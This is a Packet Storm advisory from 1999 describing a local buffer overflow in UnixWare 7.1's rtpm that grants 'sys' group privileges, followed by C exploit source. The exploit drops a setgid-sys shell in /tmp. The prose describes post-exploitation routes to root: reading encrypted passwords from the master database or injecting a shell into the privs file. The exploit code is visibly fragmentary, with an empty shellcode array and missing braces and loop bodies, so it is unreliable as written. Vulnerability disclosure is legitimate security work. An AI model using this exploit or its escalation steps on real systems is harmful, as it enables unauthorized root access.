Type packetstorm
Reporter Packet Storm
Modified 1999-12-30T00:00:00


Any local users can exploit a bug in rtpm to gain "sys" privileges.   
A root compromise is then trivial.  
As usual, I've only tested UnixWare 7.1, all others should be   
assumed vulnerable.   
UnixWare has a slightly different system of managing the password   
database than Linux/BSD/Solaris and the like. In addition to the   
conventional /etc/passwd and /etc/shadow, UnixWare keeps a copy of   
these files (including encrypted passwords) in   
/etc/security/ia/master and /etc/security/ia/omaster. These are   
binary files containing the same information as /etc/passwd and   
/etc/shadow in a different format. Various UW C functions can be   
used to access this information. Some programs use this file for   
authentication purposes, instead of /etc/shadow, such as the  
i2odialog daemon.   
The only major security problem I've found with this is that group   
"sys" is able to read from this database. If there were no programs   
setgid sys, this would not be a problem, however UnixWare's   
owner/group scheme relies very heavily on this group. /dev/*mem* is   
readable by sys (instead of having a seperate kmem group) and many   
key directories, such as /sbin, and critical binaries are writable   
by this group. The /etc/security/tcb/privs database (which controls   
which non-suid/sgid programs gain additional privileges) is also   
writable by sys. As a consequence, many programs which need to   
access /dev/kmem and various other config files are sgid sys instead   
of sgid/suid to a more specialized group. Once we have exploited one   
of these programs to gain the gid of sys, we have nearly full control  
over the system.  
I suppose that the argument can be made that the gain of any extra   
privileges will allow someone to gain root, given enough time, but UW   
seems to have given privileges so close to root that they might as   
well BE root. The encrypted passwords for the system should NEVER be  
readable by anyone other than root (and *maybe* the "shadow" group,   
whose sole purpose is authentication).  
All this makes me think more about the slightly skewed but good   
intentioned UnixWare scheme of privileges. I think it's a great idea  
to have a program like ping only gain "driver" privileges (where it   
can only access devices with elevated privileges). Although there  
were/are some growing pains migrating to this system, it will probably   
end up replacing 75% of the s-bits on a UnixWare system. Naturally   
some programs will need full root privileges to operate correctly,   
but for those specialized programs that only really need to accomplish   
one task, it's perfect.  
All that being said, I wonder if any of the open source OS's like   
linux and bsd are considering migrating to this type of system, or   
at least making it an option or patch.  
A simple buffer overflow in /usr/sbin/rtpm will allow us to gain   
sys privileges. From there, you can strings(1) the   
/etc/security/ia/master file for the encrypted root password or   
inject a shell into the /etc/security/tcb/privs file. Either of   
these will lead to a fairly quick root compromise.   
A small warning about this exploit. rtpm is one of those ascii gui   
programs that messes with your term. If it doesn't exit normally,   
it will leave you with a mostly unusable session. For this reason,   
this exploit will drop /tmp/ksh as sgid-sys and exit. After you   
run the exploit, you'll probably need to forcefully logout (exit   
might not work) then log back in to get your privs. The default   
offset should work, but if it doesn't you should write a script to   
change it rather than deal with logging out/in every time you want   
to change your offset.  
** uwrtpm.c - UnixWare 7.1 rtpm exploit  
** Drops a setgid sys shell in /tmp/ksh. We can't exec a shell because  
** rtpm screws up our terminal when it exits abnormally. After running  
** this exploit, you must forcefully exit your shell and re-login to exec  
** your sys shell.  
** cc -o uwrtpm uwrtpm.c; ./rtpm <offset>  
** use offsets of +-100  
** Brock Tellier btellier@usa.net  
#include <stdlib.h>  
#include <stdio.h>  
char scoshell[]=   
#define ALIGN 3   
#define LEN 1100   
#define NOP 0x90  
#define SYSSHELL "void main() {setregid(3,3);system(\"cp /bin/ksh \  
/tmp/ksh; chgrp sys /tmp/ksh; chmod 2555 /tmp/ksh\"); } "  
void buildrt() {  
FILE *fp;  
char cc[100];  
fp = fopen("/tmp/rt.c", "w");  
fprintf(fp, SYSSHELL);  
snprintf(cc, sizeof(cc), "cc -o /tmp/rt /tmp/rt.c");  
int main(int argc, char *argv[]) {  
long int offset=0;  
int i;  
int buflen = LEN;  
long int addr;  
char buf[LEN];  
if(argc > 3) {  
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);  
else if (argc == 2){  
else if (argc == 3) {  
else {  
addr=0x8046a01 + offset;  
fprintf(stderr, "\nUnixWare 7.1 rtpm exploit drops a setgid sys shell ");  
fprintf(stderr, "in /tmp/ksh\n");  
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");  
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);  
for(i=((buflen/2) + strlen(scoshell))+ALIGN;i<buflen-4;i+=4)  
*(int *)&buf[i]=addr;  
memcpy(buf, "HOME=", 5);  
buf[buflen - 1] = 0;  
execl("/usr/sbin/rtpm", "rtpm", NULL);  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
Get free email and a permanent address at http://www.netaddress.com/?N=1